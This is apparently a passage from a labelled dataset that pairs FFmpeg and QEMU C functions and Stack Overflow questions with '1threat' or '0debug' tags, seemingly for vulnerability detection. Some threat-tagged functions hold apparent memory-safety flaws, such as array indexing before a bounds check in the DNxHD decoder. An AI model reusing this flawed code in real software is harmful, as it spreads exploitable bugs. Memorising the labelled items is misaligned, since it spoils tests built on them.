}
| 1threat
|
static void dnxhd_decode_dct_block(DNXHDContext *ctx, DCTELEM *block, int n, int qscale)
{
int i, j, index, index2;
int level, component, sign;
const uint8_t *weigth_matrix;
if (n&2) {
component = 1 + (n&1);
weigth_matrix = ctx->cid_table->chroma_weigth;
} else {
component = 0;
weigth_matrix = ctx->cid_table->luma_weigth;
}
ctx->last_dc[component] += dnxhd_decode_dc(ctx);
block[0] = ctx->last_dc[component];
for (i = 1; ; i++) {
index = get_vlc2(&ctx->gb, ctx->ac_vlc.table, DNXHD_VLC_BITS, 2);
level = ctx->cid_table->ac_level[index];
if (!level) {
return;
}
sign = get_sbits(&ctx->gb, 1);
if (ctx->cid_table->ac_index_flag[index]) {
level += get_bits(&ctx->gb, ctx->cid_table->index_bits)<<6;
}
if (ctx->cid_table->ac_run_flag[index]) {
index2 = get_vlc2(&ctx->gb, ctx->run_vlc.table, DNXHD_VLC_BITS, 2);
i += ctx->cid_table->run[index2];
}
j = ctx->scantable.permutated[i];
level = (2*level+1) * qscale * weigth_matrix[i];
if (weigth_matrix[i] != 32)
level += 32;
level >>= 6;
level = (level^sign) - sign;
if (i > 63) {
av_log(ctx->avctx, AV_LOG_ERROR, "ac tex damaged %d, %d\n", n, i);
return;
}
block[j] = level;
}
}
| 1threat
|
"mov" of "assembly language" meant copy or move? : <p>Recently, I read the C++ of std::mov, and I thought of a question as the title.</p>
<p>Assume initial value following:</p>
<pre><code>int a= 1;
int b= 2;
</code></pre>
<p>I think:</p>
<p><strong>Situation 1,</strong></p>
<p><strong>after move (a <- b):</strong></p>
<pre><code>a= 2 , b=
</code></pre>
<p>b is null because moved</p>
<p><strong>Situation 2,</strong></p>
<p><strong>after copy (a <- b):</strong></p>
<pre><code>a=2 , b=2
</code></pre>
<p>I know std::move of C++ is <strong>Situation 1</strong></p>
<p>Which situation does <code>mov</code> (<code>mov %b, %a</code>) in <strong>assembly language</strong> correspond to?</p>
<p>This is my question.</p>
| 0debug
|
static int X264_frame(AVCodecContext *ctx, AVPacket *pkt, const AVFrame *frame,
int *got_packet)
{
X264Context *x4 = ctx->priv_data;
x264_nal_t *nal;
int nnal, i, ret;
x264_picture_t pic_out;
x264_picture_init( &x4->pic );
x4->pic.img.i_csp = x4->params.i_csp;
if (x264_bit_depth > 8)
x4->pic.img.i_csp |= X264_CSP_HIGH_DEPTH;
x4->pic.img.i_plane = avfmt2_num_planes(ctx->pix_fmt);
if (frame) {
for (i = 0; i < x4->pic.img.i_plane; i++) {
x4->pic.img.plane[i] = frame->data[i];
x4->pic.img.i_stride[i] = frame->linesize[i];
}
x4->pic.i_pts = frame->pts;
x4->pic.i_type =
frame->pict_type == AV_PICTURE_TYPE_I ? X264_TYPE_KEYFRAME :
frame->pict_type == AV_PICTURE_TYPE_P ? X264_TYPE_P :
frame->pict_type == AV_PICTURE_TYPE_B ? X264_TYPE_B :
X264_TYPE_AUTO;
if (x4->params.b_interlaced && x4->params.b_tff != frame->top_field_first) {
x4->params.b_tff = frame->top_field_first;
x264_encoder_reconfig(x4->enc, &x4->params);
}
if (x4->params.vui.i_sar_height != ctx->sample_aspect_ratio.den ||
x4->params.vui.i_sar_width != ctx->sample_aspect_ratio.num) {
x4->params.vui.i_sar_height = ctx->sample_aspect_ratio.den;
x4->params.vui.i_sar_width = ctx->sample_aspect_ratio.num;
x264_encoder_reconfig(x4->enc, &x4->params);
}
}
do {
if (x264_encoder_encode(x4->enc, &nal, &nnal, frame? &x4->pic: NULL, &pic_out) < 0)
return -1;
ret = encode_nals(ctx, pkt, nal, nnal);
if (ret < 0)
return -1;
} while (!ret && !frame && x264_encoder_delayed_frames(x4->enc));
pkt->pts = pic_out.i_pts;
pkt->dts = pic_out.i_dts;
switch (pic_out.i_type) {
case X264_TYPE_IDR:
case X264_TYPE_I:
x4->out_pic.pict_type = AV_PICTURE_TYPE_I;
break;
case X264_TYPE_P:
x4->out_pic.pict_type = AV_PICTURE_TYPE_P;
break;
case X264_TYPE_B:
case X264_TYPE_BREF:
x4->out_pic.pict_type = AV_PICTURE_TYPE_B;
break;
}
pkt->flags |= AV_PKT_FLAG_KEY*pic_out.b_keyframe;
if (ret)
x4->out_pic.quality = (pic_out.i_qpplus1 - 1) * FF_QP2LAMBDA;
*got_packet = ret;
return 0;
}
| 1threat
|
Java overloading, possible return type : We have a method getMessage(), which we wish to overload. What can be the possible valid return types of the overloaded method?
public void hello(String hai)
{
}
Which of the following methods can be added to the definition of class Kid without giving rise to any compilation error?
1.void
2.int
3.String
4.Any return type
| 0debug
|
int qcow2_cache_flush(BlockDriverState *bs, Qcow2Cache *c)
{
BDRVQcow2State *s = bs->opaque;
int result = 0;
int ret;
int i;
trace_qcow2_cache_flush(qemu_coroutine_self(), c == s->l2_table_cache);
for (i = 0; i < c->size; i++) {
ret = qcow2_cache_entry_flush(bs, c, i);
if (ret < 0 && result != -ENOSPC) {
result = ret;
}
}
if (result == 0) {
ret = bdrv_flush(bs->file->bs);
if (ret < 0) {
result = ret;
}
}
return result;
}
| 1threat
|
int avfilter_init_str(AVFilterContext *filter, const char *args)
{
return avfilter_init_filter(filter, args, NULL);
}
| 1threat
|
"Could not find developer disk image" when trying to build : <p>When trying to build on my connected iphone, i get the "Could not find developer disk image" error. I have IOS 10.1 and xcode 7.2.1, but can not update xcode because i have yosemite 10.10.5, and 10.11.5 is required for the new version. What to do then?</p>
| 0debug
|
How do you override Bootstrap? : <p>I have worked with Bootstrap many times, and I usually create a separate style file where I override Bootstrap classes. I think that is the better way to do it. I also get annoyed when there is a lot of code in the Bootstrap source that I don't actually use.</p>
<p>What's the best way to override Bootstrap classes and remove the parts of the Bootstrap sources that aren't actually needed?</p>
| 0debug
|
VBA Code? Filter Table by Column (Filter --> Filter Between --> Number Range) --> Output New Table : I am trying to use VBA to filter a table by a specific column's values, and then have the new (filtered) table output on the worksheet, in a new area. Note: I want to cell-reference the range numbers.
In the example Excel table below, I want to filter the 'age' column by a range, i.e. filter --> age --> between 1 and 3 (cell-referenced). The first table is the raw data. The second is what I would like as output in the new area.
Image of raw data and desired output below
[1]: https://i.stack.imgur.com/XI0xR.png
Links to code similar to what I found, but not the same (either not using a range, or based on a specific value rather than a number range, etc.). The third has nice code for when my table changes.
https://stackoverflow.com/questions/33896599/using-vba-to-filter-data-between-two-values
https://stackoverflow.com/questions/32332021/how-can-i-filter-a-table-by-column
https://stackoverflow.com/questions/9790924/excel-vba-how-to-select-rows-based-on-data-in-a-column
| 0debug
|
static int tak_decode_frame(AVCodecContext *avctx, void *data,
int *got_frame_ptr, AVPacket *pkt)
{
TAKDecContext *s = avctx->priv_data;
AVFrame *frame = data;
ThreadFrame tframe = { .f = data };
GetBitContext *gb = &s->gb;
int chan, i, ret, hsize;
if (pkt->size < TAK_MIN_FRAME_HEADER_BYTES)
return AVERROR_INVALIDDATA;
if ((ret = init_get_bits8(gb, pkt->data, pkt->size)) < 0)
return ret;
if ((ret = ff_tak_decode_frame_header(avctx, gb, &s->ti, 0)) < 0)
return ret;
if (avctx->err_recognition & (AV_EF_CRCCHECK|AV_EF_COMPLIANT)) {
hsize = get_bits_count(gb) / 8;
if (ff_tak_check_crc(pkt->data, hsize)) {
av_log(avctx, AV_LOG_ERROR, "CRC error\n");
if (avctx->err_recognition & AV_EF_EXPLODE)
return AVERROR_INVALIDDATA;
}
}
if (s->ti.codec != TAK_CODEC_MONO_STEREO &&
s->ti.codec != TAK_CODEC_MULTICHANNEL) {
av_log(avctx, AV_LOG_ERROR, "unsupported codec: %d\n", s->ti.codec);
return AVERROR_PATCHWELCOME;
}
if (s->ti.data_type) {
av_log(avctx, AV_LOG_ERROR,
"unsupported data type: %d\n", s->ti.data_type);
return AVERROR_INVALIDDATA;
}
if (s->ti.codec == TAK_CODEC_MONO_STEREO && s->ti.channels > 2) {
av_log(avctx, AV_LOG_ERROR,
"invalid number of channels: %d\n", s->ti.channels);
return AVERROR_INVALIDDATA;
}
if (s->ti.channels > 6) {
av_log(avctx, AV_LOG_ERROR,
"unsupported number of channels: %d\n", s->ti.channels);
return AVERROR_INVALIDDATA;
}
if (s->ti.frame_samples <= 0) {
av_log(avctx, AV_LOG_ERROR, "unsupported/invalid number of samples\n");
return AVERROR_INVALIDDATA;
}
if (s->ti.bps != avctx->bits_per_raw_sample) {
avctx->bits_per_raw_sample = s->ti.bps;
if ((ret = set_bps_params(avctx)) < 0)
return ret;
}
if (s->ti.sample_rate != avctx->sample_rate) {
avctx->sample_rate = s->ti.sample_rate;
set_sample_rate_params(avctx);
}
if (s->ti.ch_layout)
avctx->channel_layout = s->ti.ch_layout;
avctx->channels = s->ti.channels;
s->nb_samples = s->ti.last_frame_samples ? s->ti.last_frame_samples
: s->ti.frame_samples;
frame->nb_samples = s->nb_samples;
if ((ret = ff_thread_get_buffer(avctx, &tframe, 0)) < 0)
return ret;
ff_thread_finish_setup(avctx);
if (avctx->bits_per_raw_sample <= 16) {
int buf_size = av_samples_get_buffer_size(NULL, avctx->channels,
s->nb_samples,
AV_SAMPLE_FMT_S32P, 0);
av_fast_malloc(&s->decode_buffer, &s->decode_buffer_size, buf_size);
if (!s->decode_buffer)
return AVERROR(ENOMEM);
ret = av_samples_fill_arrays((uint8_t **)s->decoded, NULL,
s->decode_buffer, avctx->channels,
s->nb_samples, AV_SAMPLE_FMT_S32P, 0);
if (ret < 0)
return ret;
} else {
for (chan = 0; chan < avctx->channels; chan++)
s->decoded[chan] = (int32_t *)frame->extended_data[chan];
}
if (s->nb_samples < 16) {
for (chan = 0; chan < avctx->channels; chan++) {
int32_t *decoded = s->decoded[chan];
for (i = 0; i < s->nb_samples; i++)
decoded[i] = get_sbits(gb, avctx->bits_per_raw_sample);
}
} else {
if (s->ti.codec == TAK_CODEC_MONO_STEREO) {
for (chan = 0; chan < avctx->channels; chan++)
if (ret = decode_channel(s, chan))
return ret;
if (avctx->channels == 2) {
s->nb_subframes = get_bits(gb, 1) + 1;
if (s->nb_subframes > 1) {
s->subframe_len[1] = get_bits(gb, 6);
}
s->dmode = get_bits(gb, 3);
if (ret = decorrelate(s, 0, 1, s->nb_samples - 1))
return ret;
}
} else if (s->ti.codec == TAK_CODEC_MULTICHANNEL) {
if (get_bits1(gb)) {
int ch_mask = 0;
chan = get_bits(gb, 4) + 1;
if (chan > avctx->channels)
return AVERROR_INVALIDDATA;
for (i = 0; i < chan; i++) {
int nbit = get_bits(gb, 4);
if (nbit >= avctx->channels)
return AVERROR_INVALIDDATA;
if (ch_mask & 1 << nbit)
return AVERROR_INVALIDDATA;
s->mcdparams[i].present = get_bits1(gb);
if (s->mcdparams[i].present) {
s->mcdparams[i].index = get_bits(gb, 2);
s->mcdparams[i].chan2 = get_bits(gb, 4);
if (s->mcdparams[i].index == 1) {
if ((nbit == s->mcdparams[i].chan2) ||
(ch_mask & 1 << s->mcdparams[i].chan2))
return AVERROR_INVALIDDATA;
ch_mask |= 1 << s->mcdparams[i].chan2;
} else if (!(ch_mask & 1 << s->mcdparams[i].chan2)) {
return AVERROR_INVALIDDATA;
}
}
s->mcdparams[i].chan1 = nbit;
ch_mask |= 1 << nbit;
}
} else {
chan = avctx->channels;
for (i = 0; i < chan; i++) {
s->mcdparams[i].present = 0;
s->mcdparams[i].chan1 = i;
}
}
for (i = 0; i < chan; i++) {
if (s->mcdparams[i].present && s->mcdparams[i].index == 1)
if (ret = decode_channel(s, s->mcdparams[i].chan2))
return ret;
if (ret = decode_channel(s, s->mcdparams[i].chan1))
return ret;
if (s->mcdparams[i].present) {
s->dmode = mc_dmodes[s->mcdparams[i].index];
if (ret = decorrelate(s,
s->mcdparams[i].chan2,
s->mcdparams[i].chan1,
s->nb_samples - 1))
return ret;
}
}
}
for (chan = 0; chan < avctx->channels; chan++) {
int32_t *decoded = s->decoded[chan];
if (s->lpc_mode[chan])
decode_lpc(decoded, s->lpc_mode[chan], s->nb_samples);
if (s->sample_shift[chan] > 0)
for (i = 0; i < s->nb_samples; i++)
decoded[i] <<= s->sample_shift[chan];
}
}
align_get_bits(gb);
skip_bits(gb, 24);
if (get_bits_left(gb) < 0)
av_log(avctx, AV_LOG_DEBUG, "overread\n");
else if (get_bits_left(gb) > 0)
av_log(avctx, AV_LOG_DEBUG, "underread\n");
if (avctx->err_recognition & (AV_EF_CRCCHECK | AV_EF_COMPLIANT)) {
if (ff_tak_check_crc(pkt->data + hsize,
get_bits_count(gb) / 8 - hsize)) {
av_log(avctx, AV_LOG_ERROR, "CRC error\n");
if (avctx->err_recognition & AV_EF_EXPLODE)
return AVERROR_INVALIDDATA;
}
}
switch (avctx->sample_fmt) {
case AV_SAMPLE_FMT_U8P:
for (chan = 0; chan < avctx->channels; chan++) {
uint8_t *samples = (uint8_t *)frame->extended_data[chan];
int32_t *decoded = s->decoded[chan];
for (i = 0; i < s->nb_samples; i++)
samples[i] = decoded[i] + 0x80;
}
break;
case AV_SAMPLE_FMT_S16P:
for (chan = 0; chan < avctx->channels; chan++) {
int16_t *samples = (int16_t *)frame->extended_data[chan];
int32_t *decoded = s->decoded[chan];
for (i = 0; i < s->nb_samples; i++)
samples[i] = decoded[i];
}
break;
case AV_SAMPLE_FMT_S32P:
for (chan = 0; chan < avctx->channels; chan++) {
int32_t *samples = (int32_t *)frame->extended_data[chan];
for (i = 0; i < s->nb_samples; i++)
samples[i] <<= 8;
}
break;
}
*got_frame_ptr = 1;
return pkt->size;
}
| 1threat
|
Determining which overload was selected : <p>Let's say I have some arbitrary complicated overloaded function:</p>
<pre><code>template <class T> void foo(T&& );
template <class T> void foo(T* );
void foo(int );
</code></pre>
<p>I want to know, for a given expression, <em>which</em> <code>foo()</code> gets called. For example, given some macro <code>WHICH_OVERLOAD</code>:</p>
<pre><code>using T = WHICH_OVERLOAD(foo, 0); // T is void(*)(int);
using U = WHICH_OVERLOAD(foo, "hello"); // U is void(*)(const char*);
// etc.
</code></pre>
<p>I don't know where I would use such a thing - I'm just curious if it's possible. </p>
| 0debug
|
static inline void gen_bcond(DisasContext *ctx, int type)
{
uint32_t bo = BO(ctx->opcode);
int l1;
TCGv target;
ctx->exception = POWERPC_EXCP_BRANCH;
if (type == BCOND_LR || type == BCOND_CTR || type == BCOND_TAR) {
target = tcg_temp_local_new();
if (type == BCOND_CTR)
tcg_gen_mov_tl(target, cpu_ctr);
else if (type == BCOND_TAR)
gen_load_spr(target, SPR_TAR);
else
tcg_gen_mov_tl(target, cpu_lr);
} else {
TCGV_UNUSED(target);
}
if (LK(ctx->opcode))
gen_setlr(ctx, ctx->nip);
l1 = gen_new_label();
if ((bo & 0x4) == 0) {
TCGv temp = tcg_temp_new();
if (unlikely(type == BCOND_CTR)) {
gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL);
return;
}
tcg_gen_subi_tl(cpu_ctr, cpu_ctr, 1);
if (NARROW_MODE(ctx)) {
tcg_gen_ext32u_tl(temp, cpu_ctr);
} else {
tcg_gen_mov_tl(temp, cpu_ctr);
}
if (bo & 0x2) {
tcg_gen_brcondi_tl(TCG_COND_NE, temp, 0, l1);
} else {
tcg_gen_brcondi_tl(TCG_COND_EQ, temp, 0, l1);
}
tcg_temp_free(temp);
}
if ((bo & 0x10) == 0) {
uint32_t bi = BI(ctx->opcode);
uint32_t mask = 1 << (3 - (bi & 0x03));
TCGv_i32 temp = tcg_temp_new_i32();
if (bo & 0x8) {
tcg_gen_andi_i32(temp, cpu_crf[bi >> 2], mask);
tcg_gen_brcondi_i32(TCG_COND_EQ, temp, 0, l1);
} else {
tcg_gen_andi_i32(temp, cpu_crf[bi >> 2], mask);
tcg_gen_brcondi_i32(TCG_COND_NE, temp, 0, l1);
}
tcg_temp_free_i32(temp);
}
gen_update_cfar(ctx, ctx->nip);
if (type == BCOND_IM) {
target_ulong li = (target_long)((int16_t)(BD(ctx->opcode)));
if (likely(AA(ctx->opcode) == 0)) {
gen_goto_tb(ctx, 0, ctx->nip + li - 4);
} else {
gen_goto_tb(ctx, 0, li);
}
gen_set_label(l1);
gen_goto_tb(ctx, 1, ctx->nip);
} else {
if (NARROW_MODE(ctx)) {
tcg_gen_andi_tl(cpu_nip, target, (uint32_t)~3);
} else {
tcg_gen_andi_tl(cpu_nip, target, ~3);
}
tcg_gen_exit_tb(0);
gen_set_label(l1);
gen_update_nip(ctx, ctx->nip);
tcg_gen_exit_tb(0);
}
if (type == BCOND_LR || type == BCOND_CTR) {
tcg_temp_free(target);
}
}
| 1threat
|
How to create page curl effect : <p>I want to apply a page curl transformation to PageView's pages similar to the attached screenshots.</p>
<p>Here you can see a video of the effect: <a href="https://www.youtube.com/watch?v=JqvtZwIJMLo" rel="noreferrer">https://www.youtube.com/watch?v=JqvtZwIJMLo</a></p>
<p><a href="https://i.stack.imgur.com/ZKMg4.png" rel="noreferrer"><img src="https://i.stack.imgur.com/ZKMg4.png" alt="page curl previews"></a></p>
<p><a href="https://i.stack.imgur.com/4qtyn.png" rel="noreferrer"><img src="https://i.stack.imgur.com/4qtyn.png" alt="last page curl"></a></p>
<p>Not sure if this is possible to reproduce in Flutter by just applying a transformation matrix because, as you can see, it's using an <strong>A*sin(2*π/wav*x)</strong> equation.</p>
| 0debug
|
How to get the common index of two pandas dataframes? : <p>I have two pandas DataFrames, df1 and df2, and I want to transform them so that they keep only the values at index labels common to both DataFrames.</p>
<p><em>df1</em></p>
<pre><code> values 1
0
28/11/2000 -0.055276
29/11/2000 0.027427
30/11/2000 0.066009
01/12/2000 0.012749
04/12/2000 0.113892
</code></pre>
<p><em>df2</em></p>
<pre><code> values 2
24/11/2000 -0.004808
27/11/2000 -0.001812
28/11/2000 -0.026316
29/11/2000 0.015222
30/11/2000 -0.024480
</code></pre>
<p>become</p>
<p><em>df1</em></p>
<pre><code> value 1
28/11/2000 -0.055276
29/11/2000 0.027427
30/11/2000 0.066009
</code></pre>
<p><em>df2</em></p>
<pre><code> value 2
28/11/2000 -0.026316
29/11/2000 0.015222
30/11/2000 -0.024480
</code></pre>
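For reference, a minimal sketch using toy frames like the ones above: intersect the two indexes and then select those rows from each frame.
<pre><code>import pandas as pd

df1 = pd.DataFrame({"values 1": [-0.055276, 0.027427, 0.066009, 0.012749]},
                   index=["28/11/2000", "29/11/2000", "30/11/2000", "01/12/2000"])
df2 = pd.DataFrame({"values 2": [-0.001812, -0.026316, 0.015222, -0.024480]},
                   index=["27/11/2000", "28/11/2000", "29/11/2000", "30/11/2000"])

# Keep only the rows whose index labels appear in both frames.
common = df1.index.intersection(df2.index)
df1, df2 = df1.loc[common], df2.loc[common]

print(df1)
print(df2)
</code></pre>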
| 0debug
|
Convert CSV file to Excel format in VB2012 : <p>I have a CSV file created by my VB application and I want to convert it to Excel format (.xlsx).
Can anybody please help me with that?</p>
| 0debug
|
static int matroska_parse_laces(MatroskaDemuxContext *matroska, uint8_t **buf,
int size, int type,
uint32_t **lace_buf, int *laces)
{
int res = 0, n;
uint8_t *data = *buf;
uint32_t *lace_size;
if (!type) {
*laces = 1;
*lace_buf = av_mallocz(sizeof(int));
if (!*lace_buf)
return AVERROR(ENOMEM);
*lace_buf[0] = size;
return 0;
}
assert(size > 0);
*laces = *data + 1;
data += 1;
size -= 1;
lace_size = av_mallocz(*laces * sizeof(int));
if (!lace_size)
return AVERROR(ENOMEM);
switch (type) {
case 0x1: {
uint8_t temp;
uint32_t total = 0;
for (n = 0; res == 0 && n < *laces - 1; n++) {
while (1) {
if (size == 0) {
res = AVERROR_EOF;
break;
}
temp = *data;
lace_size[n] += temp;
data += 1;
size -= 1;
if (temp != 0xff)
break;
}
total += lace_size[n];
}
if (size <= total) {
res = AVERROR_INVALIDDATA;
break;
}
lace_size[n] = size - total;
break;
}
case 0x2:
if (size != (size / *laces) * size) {
res = AVERROR_INVALIDDATA;
break;
}
for (n = 0; n < *laces; n++)
lace_size[n] = size / *laces;
break;
case 0x3: {
uint64_t num;
uint32_t total;
n = matroska_ebmlnum_uint(matroska, data, size, &num);
if (n < 0) {
av_log(matroska->ctx, AV_LOG_INFO,
"EBML block data error\n");
res = n;
break;
}
data += n;
size -= n;
total = lace_size[0] = num;
for (n = 1; res == 0 && n < *laces - 1; n++) {
int64_t snum;
int r;
r = matroska_ebmlnum_sint(matroska, data, size, &snum);
if (r < 0) {
av_log(matroska->ctx, AV_LOG_INFO,
"EBML block data error\n");
res = r;
break;
}
data += r;
size -= r;
lace_size[n] = lace_size[n - 1] + snum;
total += lace_size[n];
}
if (size <= total) {
res = AVERROR_INVALIDDATA;
break;
}
lace_size[*laces - 1] = size - total;
break;
}
}
*buf = data;
*lace_buf = lace_size;
return res;
}
| 1threat
|
R: split rows into different rows : <p>Say I have a data frame like the following:</p>
<pre><code>> mydf <- data.frame(a=c('A','B','C','D/E','F','G/H','I/J','K','L'), b=c(1,2,3,'4/5',6,'7/8','9/10',11,12))
> mydf
a b
1 A 1
2 B 2
3 C 3
4 D/E 4/5
5 F 6
6 G/H 7/8
7 I/J 9/10
8 K 11
9 L 12
</code></pre>
<p>How do I make it look like the following, with an easy one-liner (preferably base)? Thanks</p>
<pre><code>> mydf2
a b
1 A 1
2 B 2
3 C 3
4 D 4
5 E 5
6 F 6
7 G 7
8 H 8
9 I 9
10 J 10
11 K 11
12 L 12
</code></pre>
| 0debug
|
Android Studio: Use two setOnClickListener in the MainActivity : I am developing an Android app. The topic is a cost manager.
I want to use two setOnClickListener calls in the MainActivity for two buttons.
The first button changes the view to a second page (activity). On this page there is a second button, which just prints out a log message.
But the app crashes and does not throw an error message. The failure has to be in the second onClickListener, because without it, it works.
Here is my source code. Please help me.
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
// Init all Elements
Button btn_hinzufügen = (Button) findViewById(R.id.btn_add);
Button btn_speichern = (Button) findViewById(R.id.btn_speichern);
btn_hinzufügen.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
open_add_data();
}
});
btn_speichern.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Log.i("Info", "Say Hello");
}
});
}
public void open_add_data() {
setContentView(R.layout.add_data);
}
}
| 0debug
|
static int walk_memory_regions_1(struct walk_memory_regions_data *data,
abi_ulong base, int level, void **lp)
{
abi_ulong pa;
int i, rc;
if (*lp == NULL) {
return walk_memory_regions_end(data, base, 0);
}
if (level == 0) {
PageDesc *pd = *lp;
for (i = 0; i < L2_SIZE; ++i) {
int prot = pd[i].flags;
pa = base | (i << TARGET_PAGE_BITS);
if (prot != data->prot) {
rc = walk_memory_regions_end(data, pa, prot);
if (rc != 0) {
return rc;
}
}
}
} else {
void **pp = *lp;
for (i = 0; i < L2_SIZE; ++i) {
pa = base | ((abi_ulong)i <<
(TARGET_PAGE_BITS + L2_BITS * level));
rc = walk_memory_regions_1(data, pa, level - 1, pp + i);
if (rc != 0) {
return rc;
}
}
}
return 0;
}
| 1threat
|
How to get index path for existing object in collection view : <p>I have an array of objects and populate the collection view with them. For example, I have 3 objects inside my collection view. Is there a way to retrieve the current index path based on the object name?</p>
<p>Thanks</p>
| 0debug
|
How to save data with SharedPreferences in a Fragment : Hi, I'm having a problem with saving data permanently. It should be simple: I'm sending data to another fragment and it works perfectly; however, I have almost no idea how to save the data.
Here is my code:
/*package com.example.mskydraw.notetech;
import android.os.Bundle;
import android.support.v4.app.Fragment;
import android.support.annotation.Nullable;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.app.Activity;
import android.widget.Button;
import android.widget.EditText;
public class Cofo extends Fragment {
private static EditText Txt;
TopSectionListener activityCommander;
public interface TopSectionListener{
public void createMeme(String top);
};
@Override
public void onAttach(Activity activity) {
super.onAttach(activity);
try {
activityCommander = (TopSectionListener) activity;
}catch (ClassCastException e){
throw new ClassCastException(activity.toString());
}
}
@Override
public View onCreateView(LayoutInflater inflater,@Nullable
ViewGroup container, @Nullable
Bundle savedInstanceState) {
// Inflate the layout for this fragment
View view = inflater.inflate(R.layout.fragment_cofo,
container,false);
Txt = (EditText) view.findViewById(R.id.Txt);
final Button Btn = (Button) view.findViewById(R.id.Btn);
Btn.setOnClickListener(
new View.OnClickListener(){
public void onClick(View v){
buttonClicked(v);
};
}
);
return view;
}
// call this whenever the button is clicked!
public void buttonClicked(View view){
activityCommander.createMeme(Txt.getText().toString());
};
} */
package com.example.mskydraw.notetech;
import android.content.Context;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Gallery;
import android.widget.TextView;
import android.widget.Toast;
import java.io.FileOutputStream;
import static android.content.Context.MODE_PRIVATE;
/**
* A simple {@link Fragment} subclass.
*/
public class Cofo extends Fragment {
final static String SHARED_NAME_STRING="sharedp";
final static String USER_NAME_STRING="user";
public Cofo() {
// Required empty public constructor
}
EditText newTxt;
Button newBtn;
SharedPreferences sharedPreferences;
Context c = getActivity();
@Override
public View onCreateView(LayoutInflater inflater, ViewGroup container,
Bundle savedInstanceState) {
// Inflate the layout for this fragment
View view = inflater.inflate(R.layout.fragment_cofo, container, false);
// finding my bouton and text on layout
newTxt = (EditText)view.findViewById(R.id.Txt);
newBtn = (Button)view.findViewById(R.id.Btn);
sharedPreferences=this.c.getSharedPreferences(SHARED_NAME_STRING,Context.MODE_PRIVATE);
String userNameString=sharedPreferences.getString(USER_NAME_STRING, "");
newTxt.setText(userNameString);
// whenever I click on the bouton
newBtn.setOnClickListener(new View.OnClickListener(){
@Override
public void onClick(View v){
//This code allows you to jump into another fragment
// Call the fragment to where I want to jump
Main_content newmain = new Main_content();
//Here we are going to learn to how to save data
String Message = newTxt.getText().toString();
String file_name = "Hello_file";
// Create an object output string
//here we are sending data to another fragment
//You have declare bundle
Bundle bundle = new Bundle();
// You can use bundle.putxx everything such as String...float..
bundle.putInt("N1",5);
//calling the fragment I'm going to send the data
// and I'm going to send data I saved on bundle.
newmain.setArguments(bundle);
// The process of declaration fragment
FragmentManager manager = getFragmentManager();
// Jumping into main content fragment
manager.beginTransaction().replace(R.id.fragment,newmain).commit();
if (newTxt.getText().toString().equals("Hello")){
Toast.makeText(Cofo.this.getActivity(), "true", Toast.LENGTH_SHORT).show();
}
else{
Toast.makeText(Cofo.this.getActivity(), "Hi", Toast.LENGTH_SHORT).show();
}
SharedPreferences.Editor editor=sharedPreferences.edit();
}
});
return view;
}
}
| 0debug
|
How to Solve: Error:Execution failed for task ':app:transformClassesWithInstantRunForDebug' : <p>The full error is this</p>
<p>Error:Execution failed for task ':app:transformClassesWithInstantRunForDebug'.</p>
<blockquote>
<p>java.lang.IllegalStateException: Expected BEGIN_ARRAY but was STRING at line 1 column 1 path $</p>
</blockquote>
<p>I made a small change to my project in Android Studio and tried to run it, and it crashed my PC; it was completely frozen for a couple of minutes, the first time this has happened while compiling in AS (I didn't use ADB). When my PC restarted, I got the error</p>
<p>Error:null value in entry: blameLogFolder=null</p>
<p>Search results told me to delete the .gradle folder of my project, so I did that, and when I ran it again I got this new error.</p>
<p>I have no clue what's wrong or how to fix it, and searching online was no further help.</p>
<p>Everything was working perfectly fine 10 minutes ago and now the project won't compile; I can't even make an APK.</p>
| 0debug
|
QFloat *qobject_to_qfloat(const QObject *obj)
{
if (qobject_type(obj) != QTYPE_QFLOAT)
return NULL;
return container_of(obj, QFloat, base);
}
| 1threat
|
Generating specific output patterns from a Python tuple : Given a Python tuple
products = (a, b, c, d, e, f, g)
I seek to generate a new tuple/list from 'products', but according to specific patterns:
1. all possible chronological combinations to make pairs e.g. ab, ac...af, ag, bc, and so on
2. similar to #1, but making sets of three and making sure the increment change to either side of the 'middle' product is equal e.g. abc, bcd, cde, def *and* ace, bdf, ceg
3. sets of four, again making sure that the increment change is equal to either side (and between) middle products e.g. abcd, bcde … aceg
From asking around and reading the Python docs, the itertools.combinations() function seemed a step in the right direction. But given the specific patterns being sought, it seems more than that function in its standard form is needed. Any suggestions?
P.S. The *average* actual tuple is several times longer than the example above (I'll have about 40 tuples in total), and some 'products' within each will expire/drop out and new ones will be added every few weeks, so manually entering the combinations into new tuples isn't in keeping with the aim of automation.
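For illustration, a short sketch under the assumption that "equal increment to either side of the middle" means an arithmetic progression of positions; pattern 1 is plain itertools.combinations, while patterns 2 and 3 fall out of iterating over every step size that still fits in the tuple:
<pre><code>from itertools import combinations

products = ("a", "b", "c", "d", "e", "f", "g")

# 1. All chronological pairs: ab, ac, ..., af, ag, bc, ...
pairs = list(combinations(products, 2))

# 2./3. Equally spaced runs of length k: positions i, i+d, i+2d, ...
def equally_spaced(seq, k):
    n = len(seq)
    return [tuple(seq[i + j * d] for j in range(k))
            for d in range(1, n)                 # step between neighbours
            for i in range(n - (k - 1) * d)]     # starting position

triples = equally_spaced(products, 3)  # abc, bcd, ..., ace, bdf, ceg, adg
quads   = equally_spaced(products, 4)  # abcd, bcde, cdef, defg, aceg
</code></pre>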
| 0debug
|
document.getElementById('input').innerHTML = user_input;
| 1threat
|
wmic is not recognized as an internal or external command, operable program or batch file : <p>I'm trying to get my motherboard's serial number through the following command in windows 10 cmd: </p>
<pre><code>wmic baseboard get serialnumber
</code></pre>
<p>but I receive this Error:</p>
<pre><code>wmic is not recognized as an internal or external command, operable program or batch file
</code></pre>
<p>However, this command works on other systems of mine (for example, my office PC). What may be wrong?</p>
| 0debug
|
Why do some websites duplicate their background images, to fill the screen size, rather than upload a larger image in the first place? : <p>For the past few days, I have been looking at the various ways websites upload background images to their website via CSS.</p>
